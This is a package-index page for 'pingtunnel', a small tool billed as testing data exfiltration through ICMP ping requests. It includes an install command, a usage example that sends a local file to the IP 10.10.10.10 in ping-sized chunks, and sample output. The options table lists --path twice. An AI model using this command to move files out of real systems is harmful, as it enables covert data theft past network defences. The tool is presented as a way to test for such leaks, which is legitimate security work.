Test possible data exfiltration through ping requests
Project description
Description
Test possible data exfiltration through ping requests
Installation
pip install pingtunnel
Usage
From command line:
python -m pingtunnel --path PATH --target TARGET
Option | Short | Type | Default | Description |
---|---|---|---|---|
--path | -p | String | - | Path to file to be exfiltrated |
--path | -p | String | - | IP of exfiltration server |
Example
python -m pingtunnel -p ./example.jpg -t 10.10.10.10
- Make sure to use
tcpdump
orwireshark
on the exfiltration server in order to capture the ping requests
################################################################################
pingtunnel by 5f0
Test possible data exfiltration through ping requests
Current working directory: path/to/pingtunnel
Datetime: 01/01/1970 10:11:12
################################################################################
Status
---
Exfiltration Server: 10.10.10.10
File to be exfiltrated: ./example.jpg
Total Number of Bytes: 1094
Number of Ping Requests: 35.0
Execution
---
-> Split ./example.jpg in 35.0 chunks
-> Send chunks
--> Transmission successful!
################################################################################
Execution Time: 0.014563 sec
License
MIT
Project details
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
pingtunnel-1.0.1.tar.gz
(3.5 kB
view hashes)
Built Distribution
Close
Hashes for pingtunnel-1.0.1-py3-none-any.whl
Algorithm | Hash digest | |
---|---|---|
SHA256 | 82dec26ec4a5b18653246e20fcb495b33155ce24e38b9e21927bcc5c5aa86b30 |
|
MD5 | 839723a4c6a8b22265419efb4693d98a |
|
BLAKE2b-256 | 5fbf11572b863332d30cfb6fa8e51bb9f1e387f5a46fa26514a24fe0cd7c8ca3 |